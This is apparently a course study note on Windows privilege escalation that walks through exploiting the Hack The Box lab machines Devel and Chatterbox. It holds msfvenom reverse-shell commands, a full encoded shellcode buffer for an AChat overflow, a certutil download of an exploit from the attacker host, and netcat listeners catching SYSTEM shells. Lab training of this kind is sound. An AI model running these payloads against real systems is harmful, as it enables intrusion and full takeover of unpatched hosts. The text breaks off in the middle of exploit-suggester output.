# TCM Course - Windows Privilege Escalation- Part 1 ###### tags: `windows` `privesc` `OSCP` `ActiveDirectory` {%hackmd theme-dark %} Course: https://academy.tcm-sec.com/courses/1154361/lectures/24795072 Nota: Está en dos partes porque el máx de caracteres por nota en HackMD es de 10000, y esto los supera x) ## Kernel Exploits - Devel ### Access to the machine Anonymous access to FTP which is serving the website. `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8888 -f aspx > manual.aspx` ### Enumerating * https://github.com/AonCyberLabs/Windows-Exploit-Suggester Nota: Va a dar muchos errores debido a elementos obsoletos relacionados con Python2, así que probar con esta PR: https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py Actualizamos la DB: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/Devel/Windows-Exploit-Suggester] └─$ python2 windows-exploit-suggester.py --update [*] initiating winsploit version 3.3... [+] writing to file 2022-11-14-mssb.xls [*] done ``` Ejecutamos en la máquina a atacar systeminfo: ```bash c:\windows\system32\inetsrv>systeminfo systeminfo Host Name: DEVEL OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: babis Registered Organization: Product ID: 55041-051-0948536-86302 Original Install Date: 17/3/2017, 4:17:31 �� System Boot Time: 13/11/2022, 11:14:49 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 3.071 MB Available Physical Memory: 2.455 MB Virtual Memory: Max Size: 6.141 MB Virtual Memory: Available: 5.530 MB Virtual Memory: In Use: 611 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Local Area Connection 3 DHCP Enabled: No IP address(es) [01]: 10.10.10.5 [02]: fe80::58c0:f1cf:abc6:bb9e [03]: dead:beef::10d5:9590:d613:ebd5 [04]: dead:beef::58c0:f1cf:abc6:bb9e ``` Y al ejecutarlo: ```Bash ──(aml㉿kali)-[~/HTB/Retired/Devel] └─$ python windows-exploit-suggester.py --database 2022-11-14-mssb.xls --systeminfo systeminfo.txt [*]initiating winsploit version 3.3... [*]database file detected as xls or xlsx based on extension [*]attempting to read from the systeminfo input file [+]systeminfo input file read successfully (utf-8) [*]querying database file for potential vulnerabilities [*]comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits [*]there are now 179 remaining vulns [+][E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+]windows version identified as 'Windows 7 32-bit' [*] [M]MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [M]MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important [E]MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [*] [E]MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M]MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M]MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [E]MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important [E]MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important [M]MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important [M]MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M]MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [*]done ``` Por ejemplo, elegí el MS11-011. Aquí https://www.exploit-db.com/exploits/11199 me dice que tengo un exploit en https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11199.zip Este no podemos probarlo porque spamea una nueva shell en modo visual que es de system, y estamos en modo consola. la MS10-059 parece que sí serviría: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059 ```bash c:\inetpub\wwwroot>Churraskito.exe Churraskito.exe This program cannot be run in DOS mode. c:\inetpub\wwwroot>Churraskito.exe "C:\Windows\system32\cmd.exe" "net user 123 123 /add" Churraskito.exe "C:\Windows\system32\cmd.exe" "net user 123 123 /add" This program cannot be run in DOS mode. ``` Sad. Parece ser que el churraskito este está basado en otro llamado chimichurri que da una revshell. El otro da el mismo problema, pero al tio del curso le va. _Press F to say F_ Vale, el fallo es del FTP. ```bash C:\Windows\Temp>certutil.exe -urlcache -f http://10.10.14.3/MS10-059.exe ms10-059.exe certutil.exe -urlcache -f http://10.10.14.3/MS10-059.exe ms10-059.exe **** Online **** CertUtil: -URLCache command completed successfully. C:\Windows\Temp>ms10-059.exe ms10-059.exe /Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR> C:\Windows\Temp> ``` Ahora funsionan ambos, era cosa del ftp, que convertía los .exe a plaintext. Los subí con certutil.exe y el httpserver de python. En el target: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/Devel] └─$ nc -nlvp 8888 listening on [any] 8888 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.5] 49247 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>cd C:\Windows\Temp cd C:\Windows\Temp C:\Windows\Temp>ms10-059.exe 10.10.14.3 8876 ms10-059.exe 10.10.14.3 8876 /Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR> ``` En nuestra máquina: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/Devel] └─$ nc -nlvp 8876 listening on [any] 8876 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.5] 49253 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\Temp>whoami whoami nt authority\system ``` ## Password Hunting and Port Forwarding - Chatterbox ### Access to the machine ```bash ┌──(aml㉿kali)-[~/HTB/Retired/chatterbox] └─$ sudo nmap -T5 -A -p135,139,445,9255,9256,49152,49153,49154,49155,49156,49157 10.10.10.74 -oN nmap.out Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 16:29 CET Nmap scan report for 10.10.10.74 Host is up (0.055s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 9255/tcp open http AChat chat system httpd |_http-server-header: AChat |_http-title: Site doesn\'t have a title. 9256/tcp open achat AChat chat system 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft Windows 2008 OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 OS details: Microsoft Windows Server 2008 SP1 Network Distance: 2 hops Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6h40m01s, deviation: 2h53m14s, median: 5h00m00s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2022-11-14T20:30:54 |_ start_date: 2022-11-14T20:18:39 | smb2-security-mode: | 2.1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: Chatterbox | NetBIOS computer name: CHATTERBOX\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-11-14T15:30:56-05:00 TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 64.87 ms 10.10.14.1 2 65.04 ms 10.10.10.74 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 98.34 seconds ``` La password de guest es (blank), porque con otras da el error `NT_STATUS_LOGON_FAILURE`. ```bash ┌──(aml㉿kali)-[~] └─$ searchsploit achat ---------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------- --------------------------------- Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | windows/remote/36056.rb MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32958.txt Parachat 5.5 - Directory Traversal | php/webapps/24647.txt ---------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` Creating revshell for BoF ```bash ┌──(aml㉿kali)-[~/HTB/Retired/chatterbox] └─$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8877 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/unicode_mixed x86/unicode_mixed succeeded with size 774 (iteration=0) x86/unicode_mixed chosen with final size 774 Payload size: 774 bytes Final size of python file: 3767 bytes buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" buf += b"\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x38\x68\x44\x42" buf += b"\x6d\x30\x49\x70\x4d\x30\x61\x50\x74\x49\x49\x55\x4e" buf += b"\x51\x49\x30\x42\x44\x64\x4b\x42\x30\x70\x30\x64\x4b" buf += b"\x70\x52\x7a\x6c\x44\x4b\x71\x42\x4d\x44\x42\x6b\x70" buf += b"\x72\x4f\x38\x4c\x4f\x38\x37\x6d\x7a\x6b\x76\x6e\x51" buf += b"\x6b\x4f\x34\x6c\x4d\x6c\x51\x51\x71\x6c\x4c\x42\x4c" buf += b"\x6c\x6f\x30\x67\x51\x76\x6f\x4c\x4d\x4a\x61\x76\x67" buf += b"\x6b\x32\x49\x62\x4e\x72\x4e\x77\x54\x4b\x70\x52\x6c" buf += b"\x50\x72\x6b\x50\x4a\x4f\x4c\x44\x4b\x70\x4c\x4e\x31" buf += b"\x74\x38\x4a\x43\x6e\x68\x79\x71\x58\x51\x72\x31\x64" buf += b"\x4b\x62\x39\x4f\x30\x6a\x61\x49\x43\x72\x6b\x71\x39" buf += b"\x4a\x78\x4b\x33\x6c\x7a\x71\x39\x52\x6b\x4c\x74\x52" buf += b"\x6b\x5a\x61\x6a\x36\x50\x31\x49\x6f\x46\x4c\x47\x51" buf += b"\x58\x4f\x6c\x4d\x4b\x51\x57\x57\x70\x38\x67\x70\x70" buf += b"\x75\x68\x76\x39\x73\x51\x6d\x6b\x48\x6d\x6b\x51\x6d" buf += b"\x6e\x44\x50\x75\x57\x74\x50\x58\x54\x4b\x72\x38\x4c" buf += b"\x64\x79\x71\x59\x43\x42\x46\x42\x6b\x6a\x6c\x30\x4b" buf += b"\x32\x6b\x42\x38\x6b\x6c\x49\x71\x76\x73\x34\x4b\x4d" buf += b"\x34\x44\x4b\x4b\x51\x56\x70\x51\x79\x61\x34\x4d\x54" buf += b"\x6c\x64\x31\x4b\x31\x4b\x63\x31\x52\x39\x31\x4a\x52" buf += b"\x31\x69\x6f\x37\x70\x4f\x6f\x71\x4f\x4e\x7a\x72\x6b" buf += b"\x5a\x72\x7a\x4b\x44\x4d\x61\x4d\x4f\x78\x6c\x73\x6c" buf += b"\x72\x4d\x30\x6b\x50\x61\x58\x44\x37\x73\x43\x50\x32" buf += b"\x4f\x6f\x51\x44\x42\x48\x70\x4c\x31\x67\x6e\x46\x49" buf += b"\x77\x4b\x4f\x59\x45\x56\x58\x34\x50\x4b\x51\x4b\x50" buf += b"\x4b\x50\x4c\x69\x65\x74\x50\x54\x32\x30\x31\x58\x4d" buf += b"\x59\x71\x70\x72\x4b\x4d\x30\x79\x6f\x6a\x35\x42\x30" buf += b"\x4e\x70\x42\x30\x72\x30\x4f\x50\x4e\x70\x31\x30\x6e" buf += b"\x70\x52\x48\x68\x6a\x6c\x4f\x59\x4f\x49\x50\x4b\x4f" buf += b"\x6a\x35\x54\x57\x31\x5a\x7a\x65\x4f\x78\x5a\x6a\x4b" buf += b"\x5a\x4a\x6e\x6d\x33\x33\x38\x6a\x62\x69\x70\x4d\x52" buf += b"\x66\x4d\x53\x59\x49\x56\x72\x4a\x4c\x50\x50\x56\x31" buf += b"\x47\x4f\x78\x55\x49\x73\x75\x54\x34\x30\x61\x49\x6f" buf += b"\x36\x75\x35\x35\x47\x50\x72\x54\x7a\x6c\x79\x6f\x50" buf += b"\x4e\x39\x78\x72\x55\x7a\x4c\x52\x48\x78\x70\x45\x65" buf += b"\x43\x72\x62\x36\x6b\x4f\x48\x55\x33\x38\x63\x33\x62" buf += b"\x4d\x6f\x74\x4d\x30\x54\x49\x38\x63\x62\x37\x51\x47" buf += b"\x50\x57\x4e\x51\x59\x66\x42\x4a\x6a\x72\x62\x39\x42" buf += b"\x36\x49\x52\x4b\x4d\x33\x36\x59\x37\x6f\x54\x6c\x64" buf += b"\x4f\x4c\x79\x71\x6a\x61\x74\x4d\x6d\x74\x6d\x54\x4e" buf += b"\x30\x59\x36\x69\x70\x51\x34\x4f\x64\x6e\x70\x61\x46" buf += b"\x51\x46\x30\x56\x4f\x56\x42\x36\x50\x4e\x70\x56\x50" buf += b"\x56\x30\x53\x4f\x66\x30\x68\x72\x59\x68\x4c\x4f\x4f" buf += b"\x33\x56\x69\x6f\x56\x75\x31\x79\x6b\x30\x6e\x6e\x42" buf += b"\x36\x4f\x56\x49\x6f\x6e\x50\x30\x68\x4c\x48\x32\x67" buf += b"\x4b\x6d\x73\x30\x69\x6f\x77\x65\x75\x6b\x78\x70\x36" buf += b"\x55\x44\x62\x71\x46\x32\x48\x57\x36\x73\x65\x37\x4d" buf += b"\x63\x6d\x59\x6f\x37\x65\x4f\x4c\x49\x76\x71\x6c\x6a" buf += b"\x6a\x35\x30\x59\x6b\x57\x70\x63\x45\x79\x75\x37\x4b" buf += b"\x31\x37\x4b\x63\x62\x52\x32\x4f\x32\x4a\x79\x70\x4f" buf += b"\x63\x39\x6f\x79\x45\x41\x41" ``` Edited the BoF, adding the revshell and the IP of the target and: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/chatterbox] └─$ python2 36025.py ---->{P00F}! ``` ```bash ┌──(aml㉿kali)-[~/HTB/Retired/chatterbox] └─$ nc -nlvp 8877 listening on [any] 8877 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.74] 49158 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami chatterbox\alfred C:\Windows\system32>hostname hostname Chatterbox ``` ### Enumerating Systeminfo ```bash Host Name: CHATTERBOX OS Name: Microsoft Windows 7 Professional OS Version: 6.1.7601 Service Pack 1 Build 7601 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00371-222-9819843-86663 Original Install Date: 12/10/2017, 9:18:19 AM System Boot Time: 11/14/2022, 4:22:38 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 1,597 MB Virtual Memory: Max Size: 4,095 MB Virtual Memory: Available: 3,650 MB Virtual Memory: In Use: 445 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: \\CHATTERBOX Hotfix(s): 183 Hotfix(s) Installed. [01]: KB2849697 [02]: KB2849696 [03]: KB2841134 [04]: KB2670838 [05]: KB2830477 [06]: KB2592687 [07]: KB2479943 [08]: KB2491683 [09]: KB2506212 [10]: KB2506928 [11]: KB2509553 [12]: KB2533552 [13]: KB2534111 [14]: KB2545698 [15]: KB2547666 [16]: KB2552343 [17]: KB2560656 [18]: KB2563227 [19]: KB2564958 [20]: KB2574819 [21]: KB2579686 [22]: KB2604115 [23]: KB2620704 [24]: KB2621440 [25]: KB2631813 [26]: KB2639308 [27]: KB2640148 [28]: KB2647753 [29]: KB2654428 [30]: KB2660075 [31]: KB2667402 [32]: KB2676562 [33]: KB2685811 [34]: KB2685813 [35]: KB2690533 [36]: KB2698365 [37]: KB2705219 [38]: KB2719857 [39]: KB2726535 [40]: KB2727528 [41]: KB2729094 [42]: KB2732059 [43]: KB2732487 [44]: KB2736422 [45]: KB2742599 [46]: KB2750841 [47]: KB2761217 [48]: KB2763523 [49]: KB2770660 [50]: KB2773072 [51]: KB2786081 [52]: KB2799926 [53]: KB2800095 [54]: KB2807986 [55]: KB2808679 [56]: KB2813430 [57]: KB2820331 [58]: KB2834140 [59]: KB2840631 [60]: KB2843630 [61]: KB2847927 [62]: KB2852386 [63]: KB2853952 [64]: KB2857650 [65]: KB2861698 [66]: KB2862152 [67]: KB2862330 [68]: KB2862335 [69]: KB2864202 [70]: KB2868038 [71]: KB2871997 [72]: KB2884256 [73]: KB2891804 [74]: KB2892074 [75]: KB2893294 [76]: KB2893519 [77]: KB2894844 [78]: KB2900986 [79]: KB2908783 [80]: KB2911501 [81]: KB2912390 [82]: KB2918077 [83]: KB2919469 [84]: KB2923545 [85]: KB2931356 [86]: KB2937610 [87]: KB2943357 [88]: KB2952664 [89]: KB2966583 [90]: KB2968294 [91]: KB2970228 [92]: KB2972100 [93]: KB2973112 [94]: KB2973201 [95]: KB2973351 [96]: KB2977292 [97]: KB2978742 [98]: KB2984972 [99]: KB2985461 [100]: KB2991963 [101]: KB2992611 [102]: KB3003743 [103]: KB3004361 [104]: KB3004375 [105]: KB3006121 [106]: KB3006137 [107]: KB3010788 [108]: KB3011780 [109]: KB3013531 [110]: KB3020370 [111]: KB3020388 [112]: KB3021674 [113]: KB3021917 [114]: KB3022777 [115]: KB3023215 [116]: KB3030377 [117]: KB3035126 [118]: KB3037574 [119]: KB3042058 [120]: KB3045685 [121]: KB3046017 [122]: KB3046269 [123]: KB3054476 [124]: KB3055642 [125]: KB3059317 [126]: KB3060716 [127]: KB3061518 [128]: KB3067903 [129]: KB3068708 [130]: KB3071756 [131]: KB3072305 [132]: KB3074543 [133]: KB3075226 [134]: KB3078601 [135]: KB3078667 [136]: KB3080149 [137]: KB3084135 [138]: KB3086255 [139]: KB3092627 [140]: KB3093513 [141]: KB3097989 [142]: KB3101722 [143]: KB3102429 [144]: KB3107998 [145]: KB3108371 [146]: KB3108381 [147]: KB3108664 [148]: KB3109103 [149]: KB3109560 [150]: KB3110329 [151]: KB3118401 [152]: KB3122648 [153]: KB3123479 [154]: KB3126587 [155]: KB3127220 [156]: KB3133977 [157]: KB3137061 [158]: KB3138378 [159]: KB3138612 [160]: KB3138910 [161]: KB3139398 [162]: KB3139914 [163]: KB3140245 [164]: KB3147071 [165]: KB3150220 [166]: KB3150513 [167]: KB3156016 [168]: KB3156019 [169]: KB3159398 [170]: KB3161102 [171]: KB3161949 [172]: KB3161958 [173]: KB3172605 [174]: KB3177467 [175]: KB3179573 [176]: KB3184143 [177]: KB3185319 [178]: KB4014596 [179]: KB4019990 [180]: KB4040980 [181]: KB976902 [182]: KB982018 [183]: KB4054518 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection 4 DHCP Enabled: No IP address(es) ``` Launching ExploitSuggester: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/Devel] └─$ python windows-exploit-suggester.py -i Windows-Exploit-Suggester/systeminfo.txt -d 2022-11-14-mssb.xls [*]initiating winsploit version 3.3... [*]database file detected as xls or xlsx based on extension [*]attempting to read from the systeminfo input file [+]systeminfo input file read successfully (utf-8) [*]querying database file for potential vulnerabilities [*]comparing the 183 hotfix(es) against the 381 potential bulletins(s) with a database of 137 known exploits [*]there are now 175 remaining vulns [+][E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+]windows version identified as 'Windows 7 SP1 32-bit' [*] [E]MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important [*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135) [*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) [*] https://github.com/tinysec/public/tree/master/CVE-2016-7255 [*] [E]MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important [*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) [*] [M]MS16-075: Security Update for Windows SMB Server (3164038) - Important [*] https://github.com/foxglovesec/RottenPotato [*] https://github.com/Kevin-Robertson/Tater [*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege [*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation [*] [E]MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important [*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC [*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC [*] [E]MS16-056: Security Update for Windows Journal (3156761) - Critical [*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056) [*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java­Script­Stack­Walker memory corruption [*] [M]MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important [*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF [*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC [*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC [*] [E]MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important [*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC [*] [E]MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important [*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC [*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC [*] [M]MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important [*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC [*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF [*] [M]MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical [*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC [*] http://www.exploit-db.com/exploits/35229/ -- 